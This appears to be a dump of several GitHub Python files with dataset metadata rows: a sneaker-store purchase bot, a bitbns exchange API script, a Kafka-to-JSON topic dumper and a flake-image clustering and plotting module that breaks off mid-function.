def get_product_page_url():
for retries in range(15):
response = session.get(new_arrivals_page_url).text
soup = bs(response, 'lxml')
print('Trying to find keywords, attempt {}...'.format(retries+1))
href_link = soup.find(
"a", {'itemprop': 'url', 'href': re.compile("|".join(keywords))})
if href_link is None:
time.sleep(1)
else:
break
product_page_url = base_url + href_link.get('href')
print("Acquired product page url: {}".format(product_page_url))
add_to_cart(product_page_url)
def add_to_cart(product_page_url):
response = session.get(product_page_url).text
soup = bs(response, 'lxml')
for size in sizes:
option = soup.find('option', {'data-sku': re.compile('-' + str(size))})
if option:
if float(option.text) == size:
id = option.get('value')
webbrowser.open_new(base_url + '/cart/{}:1'.format(id))
else:
print("Size {} sold out...".format(size))
if __name__ == "__main__":
total_time = time.time()
session = requests.Session()
session.headers.update(
{'User-Agent': '"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"'}
)
get_product_page_url()
print("Total time: ", time.time() - total_time)
| athithianr/deadstock-bot | bots/theclosetinc_bot.py | theclosetinc_bot.py | py | 1,681 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "bs4.BeautifulSoup",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line... |
6411274184 | import json
from bitbnspy import bitbns
# from bitbnspy import bitbns
import config
key = config.apiKey
secretKey = config.secret
bitbnsObj = bitbns(key, secretKey)
# print('APIstatus: =', bitbnsObj.getApiUsageStatus)
# getPairTicker = bitbnsObj.getTickerApi('DOGE')
# print(' PairTicker : ', getPairTicker)
print('====================================')
# dumpBid = json.dumps(getPairTicker)
# loadBid = json.loads(dumpBid)
# getBid = loadBid['highest_buy_bid']
# print('highest buy: ', loadBid)
print('====================================')
# OpenOrders = bitbnsObj.listOpenOrders('DOGE')
# print(OpenOrders)
bitbnsObj = bitbns.publicEndpoints()
getTickers = bitbnsObj.fetchTickers()
dumpTickers = json.dumps(getTickers)
loadTickers = json.loads(dumpTickers)
print(loadTickers)
| npenkar/botCode | BitbnsPy/botbns.py | botbns.py | py | 788 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "config.apiKey",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "config.secret",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "bitbnspy.bitbns",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "bitbnspy.bitbns.p... |
72753340263 | import json
import time
import os
import uuid
import argparse
from datetime import datetime, timedelta
from kafka import KafkaConsumer, SimpleConsumer
import os.path
import subprocess
def gzip_yesterday(yesterday):
#print "gzip_yesterday"
out = None
fname = args.target_folder+"/"+args.target_file+"_"+yesterday+".json"
if os.path.isfile(fname):
#check_call('gzip '+fname)
cmd = ("gzip__"+fname).split("__")
out = subprocess.check_output(cmd)
return out
def save():
#print "save"
# Kafka
consumer = KafkaConsumer(bootstrap_servers=args.kafka_bootstrap_srvs, group_id=args.kafka_group_id)
consumer.subscribe([args.kafka_source_topic])
for msg in consumer:
#
#print msg.value
indata = json.loads(msg.value)
#print indata
#
today = str(datetime.today())[0:10]
yesterday = datetime.strftime(datetime.now() - timedelta(1), '%Y%m%d')
#
#print today
#
file_name = args.target_folder+"/"+args.target_file+"_"+today.replace("-","")+".json"
with open(file_name, 'a') as the_file:
the_file.write(json.dumps(indata)+'\n')
#
if args.gzip_yesterday == "yes":
gzip_yesterday(yesterday)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Dump topic")
parser.add_argument('--kafka_bootstrap_srvs', default="localhost:9092")
parser.add_argument('--kafka_group_id', default="backup_topic")
parser.add_argument('--kafka_source_topic', default="good")
parser.add_argument('--target_folder', default="data")
parser.add_argument('--target_file', default="good")
parser.add_argument('--gzip_yesterday', default="yes")
#
args = parser.parse_args()
#
save()
| goliasz/kafka2bigquery | src/main/python/dump_topic.py | dump_topic.py | py | 1,687 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.isfile",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "subprocess.check_output",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "kafka.KafkaConsum... |
31965515598 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# vi: ts=4 sw=4
import pickle
from ..Protocols import *
from scipy.spatial.distance import cdist
from sklearn.preprocessing import StandardScaler
from sklearn.cluster import KMeans, MeanShift, estimate_bandwidth, AffinityPropagation, SpectralClustering # Clustering methods
from sklearn.decomposition import PCA
import skimage
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.patches as patches
class cluster(ProtocolMultiple):
def __init__(self, name='cluster', **kwargs):
self.name = self.__class__.__name__ if name is None else name
self.default_ext = '.pkl'
self.run_args = {
'file_extension' : '.pkl',
'force' : False,
'verbosity' : 3,
'num_jobs' : None,
'num_clusters' : 20,
'cluster_method' : 'kmeans', # 'affinity', 'kmeans', 'meanshift'
'features' : 'all', # 'shape', 'color', 'all'
'feature_normed_range' : [-2, +2], # range for plotting the normed features
'bbox_pad' : 0.5,
'image_contrast' : (0, 1),
'image_contrast_trim' : None,
'overlays' : 3,
}
self.run_args.update(kwargs)
# WARNING: This association of features names is hard-coded, and is thus contingent
# on the current implementation of Protocols.py>flake_analysis
self.feature_names_color = [
'g contrast',
'v contrast',
'gray',
'gray std',
'H',
'S',
'V',
'H std',
'S std',
'V std',
'R',
'G',
'B',
'R std',
'G std',
'B std',
'entropy'
]
self.feature_names_color = self.feature_names_color + ['{}_inner'.format(f) for f in self.feature_names_color]
self.feature_names_shape = ['P/A'] + ['hist {}'.format(i) for i in range(15)] + ['fractal dimension']
def load_flakes(self, datas, **run_args):
flakes = []
for data in datas:
with open(data.infile, 'rb') as fin:
saved = pickle.load(fin) # 'res_map', 'image_labelmap', 'flakes'
if len(flakes)==0:
h, w = saved['res_map'].shape
for flake in saved['flakes']:
flakes.append(flake)
#self.print_structure(flake)
if run_args['verbosity']>=5:
print(' {} flakes added from image {}'.format(len(saved['flakes']), data.infile))
return flakes
def load_flakes_parallel(self, datas, **run_args):
# Parallelize loading
# Doesn't seem to actually run faster (likely I/O limited)
from joblib import Parallel, delayed
import itertools
flakes = Parallel(n_jobs=run_args['num_jobs'])(delayed(self.load_flake_pkl)(data.infile) for data in datas)
flakes = list(itertools.chain.from_iterable(flakes))
return flakes
def load_flake_pkl(self, infile):
with open(infile, 'rb') as fin:
flakes = pickle.load(fin)['flakes']
return flakes
def load_features(self, flakes, **run_args):
if run_args['features']=='all':
features = [ np.concatenate([flake['flake_color_fea'], flake['flake_shape_fea']]) for flake in flakes ]
if 'flake_color_fea_names' in flakes[0]:
self.feature_names_color = flakes[0]['flake_color_fea_names']
if 'flake_shape_fea_names' in flakes[0]:
self.feature_names_shape = flakes[0]['flake_shape_fea_names']
self.feature_names = self.feature_names_color + self.feature_names_shape
else:
features = [ flake['flake_{}_fea'.format(run_args['features'])] for flake in flakes ]
if run_args['features']=='color':
if 'flake_color_fea_names' in flakes[0]:
self.feature_names = flakes[0]['flake_color_fea_names']
else:
self.feature_names = self.feature_names_color
elif run_args['features']=='shape':
if 'flake_shape_fea_names' in flakes[0]:
self.feature_names = flakes[0]['flake_shape_fea_names']
else:
self.feature_names = self.feature_names_shape
else:
if 'flake_{}_fea_names'.format(run_args['features']) in flakes[0]:
self.feature_names = flakes[0]['flake_{}_fea_names'.format(run_args['features'])]
else:
self.feature_names = []
return np.asarray(features)
def load_clustering(self, basename, output_dir='./', features_rescaled=None, **run_args):
# Load data aggregated from the "cluster" protocol into a cluster.pkl file
savefile = self.get_outfile(basename, output_dir, ext=run_args['file_extension'])
if os.path.exists(savefile):
with open(savefile, 'rb') as fin:
clustering = pickle.load(fin)
else:
savefile = self.get_outfile(basename, output_dir+'/../cluster/', ext=run_args['file_extension'])
if os.path.exists(savefile):
with open(savefile, 'rb') as fin:
clustering = pickle.load(fin)
elif features_rescaled is not None:
# Manually recompute some minimal aspects of clustering
# Note: This mostly exists so that select_flakes.run has access to this information
# even if cluster.run has never been run (and thus cluster.pkl doesn't exist).
clustering = {}
vmin, vmax = run_args['feature_normed_range']
distributions, dist_bin_edges = np.apply_along_axis(lambda x: np.histogram(x, bins=50, range=[vmin,vmax], density=True), 0, features_rescaled)
clustering['distributions'] = distributions
clustering['dist_bin_edges'] = dist_bin_edges
else:
print("Error in cluster.load_clustering: we don't have access to clustering information.")
return clustering
@run_default
def run(self, datas, output_dir, basename, **run_args):
results = {}
clustering = {} # Save results of clustering operation
# Aggregate results
########################################
flakes = self.load_flakes(datas, **run_args)
if run_args['verbosity']>=4:
print(' {:,d} flakes identified in {:d} images'.format(len(flakes), len(datas)))
features_orig = self.load_features(flakes, **run_args)
# Clustering
########################################
rescale = StandardScaler()
features = rescale.fit_transform(features_orig)
if run_args['verbosity']>=4:
print(" Clustering {:,d} flakes using '{}'".format(len(flakes), run_args['cluster_method']))
start = time.time()
n_jobs = run_args['num_jobs'] if 'num_jobs' in run_args else -1
if run_args['cluster_method']=='kmeans':
cluster_result = KMeans(n_clusters=run_args['num_clusters'], random_state=0, n_jobs=n_jobs).fit(features)
elif run_args['cluster_method']=='meanshift':
bandwidth = estimate_bandwidth(features, quantile=0.1)#, n_samples=int(features.shape[0]/10))
cluster_result = MeanShift(bandwidth=bandwidth, bin_seeding=True, n_jobs=n_jobs).fit(features)
elif run_args['cluster_method']=='affinity':
cluster_result = AffinityPropagation().fit(features)
elif run_args['cluster_method']=='spectral':
cluster_result = SpectralClustering(n_clusters=run_args['num_clusters'], n_jobs=n_jobs).fit(features)
else:
print("ERROR: clustering method '{}' not recognized.".format(run_args['cluster_method']))
raise NotImplementedError
clustering['cluster_result'] = cluster_result
results['cluster_runtime'] = time.time()-start
results['cluster_method'] = run_args['cluster_method']
# Assignments are unsorted by default
assignment = cluster_result.labels_
results['num_clusters'] = len(np.unique(assignment))
clustering['assignment'] = assignment # Label ids for each flake, saying what cluster it belongs to [unsorted indexing]
if run_args['verbosity']>=4:
print(" clustering took {:.1f}s ({:d} clusters)".format(results['cluster_runtime'], results['num_clusters']))
# Sort clusters into a sensible order
consider_features = np.asarray([flake['flake_color_fea'][:2] for flake in flakes]) # Grayscale and V contrast
# The average for each cluster gives the position for the center of that cluster (in the feature space)
central_features = np.zeros([results['num_clusters'], consider_features.shape[1]])
for i in range(results['num_clusters']):
cluster_i = np.nonzero(assignment==i)[0]
central_features[i,:] = np.mean(consider_features[cluster_i, :])
clustering['sort_indices'] = np.argsort(np.abs(central_features).sum(1))
clustering['unsort2sort'] = np.unique(clustering['sort_indices'], return_index=True)[1]
clustering['cluster_centers'] = cluster_result.cluster_centers_[clustering['sort_indices']] # in (normed) feature space coordinates [sorted indexing]
clustering['cluster_centers_orig'] = rescale.inverse_transform(clustering['cluster_centers']) # in (original) feature space coordinates [sorted indexing]
clustering['cluster_center_distances'] = cdist(clustering['cluster_centers'], clustering['cluster_centers']) # in (normed) feature space coordinates [sorted indexing]
# Compute additional things
########################################
# The distribution (histogram) for each feature dimension
# Since these are normed they should look somewhat Gaussian
vmin, vmax = run_args['feature_normed_range']
distributions, dist_bin_edges = np.apply_along_axis(lambda x: np.histogram(x, bins=50, range=[vmin,vmax], density=True), 0, features)
clustering['distributions'] = distributions
clustering['dist_bin_edges'] = dist_bin_edges
# Output results
########################################
# Save cluster results
outfile = self.get_outfile(basename, output_dir, ext=run_args['file_extension'])
results['files_saved'] = [
{ 'filename': '{}'.format(outfile) ,
'description' : 'results of cluster analysis' ,
'type' : 'data'
} ,
]
with open(outfile, 'wb') as fout:
pickle.dump(clustering, fout)
# Output images
if run_args['verbosity']>=4:
print(' Generating PCA 3D projection')
# Pick a color for each cluster
norm = mpl.colors.Normalize(vmin=0, vmax=results['num_clusters']-1)
cmap = mpl.cm.jet
#cmap = cmap_vge
m = mpl.cm.ScalarMappable(norm=norm, cmap=cmap)
cluster_colors = [m.to_rgba(index) for index in range(results['num_clusters'])]
pca = PCA(n_components=3)
coordinates = pca.fit_transform(features)
outfile = self.get_outfile(basename, output_dir, ext='-{}.png'.format(run_args['cluster_method']))
self.plot_pca(outfile, coordinates, assignment, cluster_colors, **run_args)
if run_args['verbosity']>=4:
print(' Generating map of distances')
outfile = self.get_outfile('distances', output_dir, ext='-{}.png'.format(run_args['cluster_method']))
self.plot_distances(outfile, clustering['cluster_center_distances'], cluster_colors, **run_args)
if run_args['verbosity']>=4:
print(' Generating cluster images')
self.plot_clusters(output_dir, clustering['cluster_centers'], clustering['cluster_centers_orig'], clustering['sort_indices'], distributions, dist_bin_edges, flakes, features, assignment, rescale=rescale, **run_args)
return results
def plot_pca(self, outfile, coordinates, assignment, cluster_colors, **run_args):
flake_colors = [cluster_colors[index] for index in assignment]
# Centroid of each cluster (in PCA coordinates)
num_clusters = np.max(assignment)+1
cluster_coordinates = np.zeros([num_clusters, coordinates.shape[1]])
for i in range(num_clusters):
cluster_i = np.nonzero(assignment==i)[0]
cluster_coordinates[i,:] = np.mean(coordinates[cluster_i,:], axis=0)
cluster_index = range(cluster_coordinates.shape[0])
plt.rcParams['xtick.labelsize'] = 8
plt.rcParams['ytick.labelsize'] = 8
plt.rcParams['axes.labelsize'] = 12
plt.rcParams['lines.markersize'] = 5
cmap = run_args['cmap'] if 'cmap' in run_args else 'jet'
alpha = 0.12
self.fig = plt.figure(figsize=(10,10))
self.fig.subplots_adjust(left=0.08, right=0.95, bottom=0.08, top=0.95, hspace=0.15, wspace=0.15)
self.ax = self.fig.add_subplot(2,2,2 , projection='3d')
self.ax.scatter(coordinates[:,0], coordinates[:,1], coordinates[:,2], c=flake_colors, alpha=0.3)
self.ax.set_xlabel('$\mathrm{PCA}_1$', labelpad=-4)
self.ax.set_ylabel('$\mathrm{PCA}_2$', labelpad=-4)
self.ax.set_zlabel('$\mathrm{PCA}_3$', labelpad=-2)
self.ax.tick_params(axis='both', which='major', pad=-1)
self.ax.view_init(elev=30, azim=45-90)
self.ax = self.fig.add_subplot(2,2,1)
self.ax.scatter(coordinates[:,0], coordinates[:,2], c=flake_colors, edgecolors=None, alpha=alpha)
self.ax.set_xlabel('$\mathrm{PCA}_1$')
self.ax.set_ylabel('$\mathrm{PCA}_3$')
self.overlay_cluster_number(cluster_coordinates, cluster_index, 0, 2, cluster_colors)
xi, xf, yi, yf = self.ax.axis()
self.ax.text(xi,yf, '{:,d} flakes in {} clusters'.format(len(assignment), len(cluster_colors)), size=10, verticalalignment='top', horizontalalignment='left', alpha=0.5)
self.ax = self.fig.add_subplot(2,2,3)
self.ax.scatter(coordinates[:,0], coordinates[:,1], c=flake_colors, cmap=cmap, edgecolors=None, alpha=alpha)
self.ax.set_xlabel('$\mathrm{PCA}_1$')
self.ax.set_ylabel('$\mathrm{PCA}_2$')
self.overlay_cluster_number(cluster_coordinates, cluster_index, 0, 1, cluster_colors)
self.ax = self.fig.add_subplot(2,2,4)
self.ax.scatter(coordinates[:,2], coordinates[:,1], c=flake_colors, cmap=cmap, edgecolors=None, alpha=alpha)
self.ax.set_xlabel('$\mathrm{PCA}_3$')
self.ax.set_ylabel('$\mathrm{PCA}_2$')
self.overlay_cluster_number(cluster_coordinates, cluster_index, 2, 1, cluster_colors)
plt.savefig(outfile, dpi=300)
plt.close()
def overlay_cluster_number(self, cluster_coordinates, cluster_index, coord1, coord2, cluster_colors):
r = 0.3 # r=1 means no fade (strong color), r=0 means fully faded (appears white)
cluster_colors_a = [ [ 1-(1-c[0])*r, 1-(1-c[1])*r, 1-(1-c[2])*r, c[3]] for c in cluster_colors]
self.ax.scatter(cluster_coordinates[:,coord1], cluster_coordinates[:,coord2], s=25, c=cluster_colors_a, edgecolor=cluster_colors, alpha=1)
for i in range(cluster_coordinates.shape[0]):
self.ax.text(cluster_coordinates[i, coord1], cluster_coordinates[i, coord2], '{}'.format(i), size=3, horizontalalignment='center', verticalalignment='center')
def plot_distances(self, outfile, cluster_center_distances, cluster_colors, plot_buffers=[0.15,0.05,0.15,0.05], **run_args):
plt.rcParams['xtick.labelsize'] = 15
plt.rcParams['ytick.labelsize'] = 15
plt.rcParams['axes.labelsize'] = 20
plt.rcParams['lines.markersize'] = 5
self.fig = plt.figure( figsize=(8,8), facecolor='white' )
left_buf, right_buf, bottom_buf, top_buf = plot_buffers
fig_width = 1.0-right_buf-left_buf
fig_height = 1.0-top_buf-bottom_buf
self.ax = self.fig.add_axes( [left_buf, bottom_buf, fig_width, fig_height] )
#plt.figtext(0,1, 'distances between clusters (in the feature space)', size=15, verticalalignment='top', horizontalalignment='left')
self.ax.imshow(cluster_center_distances, cmap='viridis')
self.ax.set_xlabel('cluster index')
self.ax.set_ylabel('cluster index')
xi, xf, yi, yf = self.ax.axis()
s = 0.02
n = len(cluster_colors)
self.axt = self.fig.add_axes( [left_buf, bottom_buf+fig_height, fig_width, s] )
self.axt.scatter(range(n), np.ones(n), c=cluster_colors)
if n<160:
for i in range(n):
self.axt.text(i, 1, '{}'.format(i), size=4, horizontalalignment='center', verticalalignment='center')
self.axt.axis([xi, xf, 0, 2])
self.axt.axes.get_xaxis().set_visible(False)
self.axt.axes.get_yaxis().set_visible(False)
self.axr = self.fig.add_axes( [left_buf+fig_width, bottom_buf, s, fig_height] )
self.axr.scatter(np.ones(n), range(n), c=cluster_colors)
if n<80:
for i in range(n):
self.axr.text(1, i, '{}'.format(i), size=4, horizontalalignment='center', verticalalignment='center')
self.axr.axis([0, 2, yi, yf])
self.axr.axes.get_xaxis().set_visible(False)
self.axr.axes.get_yaxis().set_visible(False)
plt.savefig(outfile, dpi=300)
def plot_clusters(self, output_dir, cluster_centers, cluster_centers_orig, sort_indices, distributions, dist_bin_edges, flakes, flake_features, assignment, rescale=None, plot_buffers=[0.01,0.0,0.0,0.045], **run_args):
plt.rcParams['xtick.labelsize'] = 15
plt.rcParams['ytick.labelsize'] = 15
plt.rcParams['axes.labelsize'] = 20
plt.rcParams['lines.markersize'] = 5
#for i, feature_vector in enumerate(cluster_centers[:1]): # for testing
for i, feature_vector in enumerate(cluster_centers):
# i # [sorted indexing]
# feature_vector # in (normed) feature space coordinates [sorted indexing]
feature_vector_orig = cluster_centers_orig[i] # in (original) feature space coordinates [sorted indexing]
i_before_sort = sort_indices[i] # [unsorted indexing]
cluster_i = np.nonzero(assignment==i_before_sort)[0] # indices [in unsorted indexing] of all flakes matching this cluster
flakes_cluster = np.asarray(flakes)[cluster_i] # flakes matching this cluster
features_cluster = flake_features[cluster_i] # feature vectors matching this cluster
self.plot_cluster(output_dir, '{:03d}'.format(i), feature_vector, feature_vector_orig, flakes_cluster, features_cluster, distributions, dist_bin_edges, rescale=rescale, plot_buffers=plot_buffers, **run_args)
def plot_cluster(self, output_dir, cluster_name, feature_vector, feature_vector_orig, flakes_cluster, features_cluster, distributions, dist_bin_edges, rescale=None, plot_buffers=[0.01,0.0,0.0,0.045], **run_args):
''' Outputs an image showing representative flakes for this cluster.
flakes_cluster, features_cluster : The subset of flakes (and their features) for this cluster.
feature_vector, feature_vector_orig : The centroid of this cluster (average of features).
distributions, dist_bin_edges : The feature distributions (for all flakes).
'''
num_flakes = len(flakes_cluster)
# Sort flakes by their distance from the cluster centroid (which is located at position "feature_vector")
distances = cdist(features_cluster, [feature_vector], metric='euclidean')[:,0]
sort_indices = np.argsort(distances)
flakes_cluster = flakes_cluster[sort_indices]
features_cluster = features_cluster[sort_indices]
distances = distances[sort_indices]
if run_args['verbosity']>=5:
print(' image for cluster {} ({:,d} flakes)'.format(cluster_name, num_flakes))
# Output a summary (central, generic, peripheral)
########################################
self.fig = plt.figure( figsize=(8,8), facecolor='white' )
fea_w, fea_h = 0.04, 0.95 # Size of features graphs in sidebar
plt.figtext(0,1, 'cluster {} ({:,d} flakes)'.format(cluster_name, num_flakes), size=20, verticalalignment='top', horizontalalignment='left')
# Sidebar that shows the feature vector for the centroid of this cluster
self._plot_cluster_sidebar(feature_vector, feature_vector_orig, features_cluster, distributions, dist_bin_edges, fea_w=fea_w, fea_h=fea_h, **run_args)
# Images of example flakes for this cluster
self._plot_cluster_main(flakes_cluster, distances, fea_w=fea_w, fea_h=fea_h, plot_buffers=plot_buffers, **run_args)
outfile = os.path.join(output_dir, 'cluster-{}-{}.png'.format(run_args['cluster_method'], cluster_name))
plt.savefig(outfile, dpi=300)
plt.close(self.fig.number)
if 'output_all' in run_args and run_args['output_all']:
# Output a summary (central, generic, peripheral)
########################################
nrows, ncols = 8, 7
num_per_page = nrows*ncols
num_pages = int(np.ceil(num_flakes/num_per_page))
for page in range(num_pages):
num_this_page = num_per_page
if page==(num_pages-1): # Last page
num_this_page = num_flakes - (num_pages-1)*num_per_page
idx_start = page*num_per_page
idx_end = idx_start+num_this_page
if run_args['verbosity']>=5:
print(' page {:d} for cluster {} ({:,d}/{:,d} flakes)'.format(page+1, cluster_name, num_this_page, num_flakes))
self.fig = plt.figure( figsize=(8,8), facecolor='white' )
plt.figtext(0,1, 'cluster {} ({:,d}/{:,d} flakes)'.format(cluster_name, num_this_page, num_flakes), size=20, verticalalignment='top', horizontalalignment='left')
# Sidebar that shows the feature vector for the centroid of this cluster
if rescale is not None:
# Since we have access to the scaling between original coordinates for feature vector
# and the rescale coordinates (avg=0, std=1), we can compute the sidebar for just the
# flakes being displayed.
# There are two equivalent ways to get the information for this subset of flakes (this page of results)
# Method 1: Load features_orig for these flakes, and transform them
#flakes_page = flakes_cluster[idx_start:idx_end]
#features_orig = self.load_features(flakes_page, **run_args)
#features_rescaled = rescale.transform(features_orig)
# Method 2: Select subset of rescaled features, and inverse_transform them
features_rescaled = features_cluster[idx_start:idx_end]
features_orig = rescale.inverse_transform(features_rescaled)
# Compute centroid for this subset of flakes (this page of results)
feature_vector_orig = np.average(features_orig, axis=0)
feature_vector = rescale.transform( [feature_vector_orig] )[0]
self._plot_cluster_sidebar(feature_vector, feature_vector_orig, features_rescaled, distributions, dist_bin_edges, fea_w=fea_w, fea_h=fea_h, **run_args)
else:
self._plot_cluster_sidebar(feature_vector, feature_vector_orig, features_cluster, distributions, dist_bin_edges, fea_w=fea_w, fea_h=fea_h, **run_args)
self._plot_cluster_page(idx_start, flakes_cluster, distances, fea_w, fea_h, plot_buffers, nrows, ncols, **run_args)
outfile = os.path.join(output_dir, 'cluster-{}-page{:03d}.png'.format(run_args['cluster_method'], page+1))
plt.savefig(outfile, dpi=300)
plt.close(self.fig.number)
def _plot_cluster_page(self, idx, flakes_cluster, distances, fea_w, fea_h, plot_buffers, nrows, ncols, **run_args):
# The total area we have available for plotting flakes
left_buf, right_buf, bottom_buf, top_buf = plot_buffers
left_buf += fea_w*( 2.2 + 2.3 )
fig_width = 1.0-right_buf-left_buf
fig_height = 1.0-top_buf-bottom_buf
w = fig_width/ncols
ystart = bottom_buf+fig_height
for irow in range(nrows):
for icol in range(ncols):
ax_pos = [left_buf+icol*w, ystart-(irow+1)*w, w, w]
if idx<len(flakes_cluster):
self._plot_flake_image(ax_pos, flakes_cluster[idx], distances[idx], **run_args)
idx += 1
def _plot_cluster_main(self, flakes_cluster, distances, fea_w, fea_h, plot_buffers, **run_args):
# The total area we have available for plotting flakes
left_buf, right_buf, bottom_buf, top_buf = plot_buffers
left_buf += fea_w*( 2.2 + 2.3 )
fig_width = 1.0-right_buf-left_buf
fig_height = 1.0-top_buf-bottom_buf
#self.ax = self.fig.add_axes( [left_buf, bottom_buf, fig_width, fig_height] )
# Central flakes
nrows, ncols = 3, 7
w = fig_width/ncols
idx = 0
ystart = bottom_buf+fig_height
plt.figtext(left_buf, ystart, 'central', size=8, verticalalignment='bottom', horizontalalignment='left')
for irow in range(nrows):
for icol in range(ncols):
ax_pos = [left_buf+icol*w, ystart-(irow+1)*w, w, w]
if idx<len(flakes_cluster):
self._plot_flake_image(ax_pos, flakes_cluster[idx], distances[idx], **run_args)
idx += 1
# Generic flakes
if idx<len(flakes_cluster):
ystart = ystart-nrows*w - 0.015
#nrows, ncols = 2, 6
w = fig_width/ncols
idx = max( int( np.clip( len(flakes_cluster)/2, idx, len(flakes_cluster)-nrows*ncols ) ), idx )
plt.figtext(left_buf, ystart, 'generic', size=8, verticalalignment='bottom', horizontalalignment='left')
for irow in range(nrows):
for icol in range(ncols):
ax_pos = [left_buf+icol*w, ystart-(irow+1)*w, w, w]
if idx<len(flakes_cluster):
self._plot_flake_image(ax_pos, flakes_cluster[idx], distances[idx], **run_args)
idx += 1
# Peripheral flakes
if idx<len(flakes_cluster):
ystart = ystart-nrows*w - 0.015
nrows, ncols = 2, 7
w = fig_width/ncols
idx = max( len(flakes_cluster)-nrows*ncols, idx )
plt.figtext(left_buf, ystart, 'peripheral', size=8, verticalalignment='bottom', horizontalalignment='left')
for irow in range(nrows):
for icol in range(ncols):
ax_pos = [left_buf+icol*w, ystart-(irow+1)*w, w, w]
if idx<len(flakes_cluster):
self._plot_flake_image(ax_pos, flakes_cluster[idx], distances[idx], **run_args)
idx += 1
def _plot_cluster_sidebar(self, feature_vector, feature_vector_orig, features_cluster, distributions, dist_bin_edges, fea_w, fea_h, **run_args):
# Sidebar that shows the feature vector for the centroid of this cluster
vmin, vmax = run_args['feature_normed_range']
self.ax = self.fig.add_axes( [0.0, 0, fea_w, fea_h] )
vector = np.asarray([feature_vector]).transpose()
self.ax.imshow(vector, cmap='inferno', aspect='auto', vmin=vmin, vmax=vmax)
self.ax.set_xticklabels([])
self.ax.set_yticklabels([])
xi, xf, yi, yf = self.ax.axis()
if len(feature_vector)<80:
for ifea, fea in enumerate(feature_vector):
if fea<0:
color = 'white'
else:
color = 'k'
self.ax.text((xi+xf)*0.5, ifea, '{:.2f}'.format(fea), color=color, size=8, verticalalignment='center', horizontalalignment='center')
self.ax.text(xf, ifea, '{:.3g}'.format(feature_vector_orig[ifea]), size=6, verticalalignment='center', horizontalalignment='left')
# Miniature histogram (of the entire distribution)
axc = self.fig.add_axes( [fea_w*2.2, fea_h-(ifea+1)*fea_h/len(feature_vector), fea_w*2.3, fea_h/len(feature_vector)] )
w = dist_bin_edges[ifea][1]-dist_bin_edges[ifea][0]
axc.bar( dist_bin_edges[ifea][:-1]+0.5*w, distributions[ifea], width=w, color='b', alpha=0.3 )
plt.xlim(vmin,vmax)
# Overlay the histogram for this cluster
distribution, dist_bin_edge = np.histogram(features_cluster[:,ifea], bins=50, range=[vmin,vmax], density=True)
distribution *= np.max(distributions[ifea])/np.max(distribution)
#axc.bar( dist_bin_edge[:-1]+0.5*w, distribution, width=w, color='purple', alpha=0.2 )
axc.plot( dist_bin_edge[:-1]+0.5*w, distribution, '-', color='purple', linewidth=0.8, alpha=0.3 )
axc.axvline(fea, color='purple', linewidth=1)
if fea<vmin:
axc.axvline(vmin, color='purple', linewidth=4)
elif fea>vmax:
axc.axvline(vmax, color='purple', linewidth=4)
axc.axes.get_xaxis().set_visible(False)
axc.axes.get_yaxis().set_visible(False)
if len(self.feature_names)==len(feature_vector):
axc.text(vmin, np.max(distributions[ifea]), self.feature_names[ifea], size=4, verticalalignment='top', horizontalalignment='left', alpha=0.25)
axc.text(vmax, np.max(distributions[ifea]), '{:d}'.format(ifea), size=4, verticalalignment='top', horizontalalignment='right', alpha=0.25)
def _plot_flake_image(self, ax_pos, flake_i, distance, **run_args):
# Load parent image
filename = flake_i['infile'].replace('\\', '/') # String replace in case files were saved on another platform.
img = plt.imread(filename)
h, w, c = img.shape
# Define image sub-region that has the flake in it
y1, y2, x1, x2 = flake_i['bbox']
# Make the crop border a bit bigger than the flake bounding box
box_size = (1+run_args['bbox_pad'])*max( abs(x2-x1), abs(y2-y1) )
x1p = int(np.clip((x1+x2)*0.5 - box_size/2, 0, w))
x2p = int(np.clip((x1+x2)*0.5 + box_size/2, 0, w))
y1p = int(np.clip((y1+y2)*0.5 - box_size/2, 0, h))
y2p = int(np.clip((y1+y2)*0.5 + box_size/2, 0, h))
box = y1p, y2p, x1p, x2p
# Adjust image of flake
flake = img[y1p:y2p , x1p:x2p, :]
in_range = self.get_in_range(img, run_args['image_contrast'], **run_args)
flake = skimage.exposure.rescale_intensity(flake, in_range=in_range, out_range='dtype')
# Plot flake
self.ax = self.fig.add_axes(ax_pos)
self.ax.axes.get_xaxis().set_visible(False)
self.ax.axes.get_yaxis().set_visible(False)
self.ax.imshow(flake)
xi, xf, yi, yf = self.ax.axis()
yc, xc = flake_i['center_of_mass']
s = '{}\nflake{:03d}\n({}, {})'.format(flake_i['infile'], flake_i['index'], int(xc), int(yc))
self.ax.text(xi, yf, s, color='white', size=3, verticalalignment='top', horizontalalignment='left')
self.ax.text(xi, yi, '${:.1f} \, \mathrm{{\mu m}}$'.format(flake_i['radius_um']), color='r', size=5, verticalalignment='bottom', horizontalalignment='left')
self.ax.text((xi+xf)*0.5, yi, '{:.1f}'.format(distance), color='white', size=2, verticalalignment='bottom', horizontalalignment='center')
self.ax.text(xf, yi, '{:.3f}'.format(flake_i['flake_contrast']), color='orange', size=3, verticalalignment='bottom', horizontalalignment='right')
# Various overlays on the flake
xc -= x1p
yc -= y1p
size = flake_i['radius_pixels']
if run_args['overlays']>=1:
c = flake_i['contour']
xs = (c[:,0] - x1p)
ys = (c[:,1] - y1p)
self.ax.plot(xs, ys, '-', linewidth=0.6, color='r', dashes=[4,1], alpha=0.2)
if run_args['overlays']>=7:
c = flake_i['convex_hull']
xs = (c[:,1] - x1p)
ys = (c[:,0] - y1p)
self.ax.plot(xs, ys, '-', linewidth=0.5, color='g', alpha=0.5)
if run_args['overlays']>=5:
rect = patches.Rectangle( ((x1-x1p), (y1-y1p)), (x2-x1), (y2-y1), linewidth=1.0, edgecolor='orange', facecolor='none', alpha=0.5)
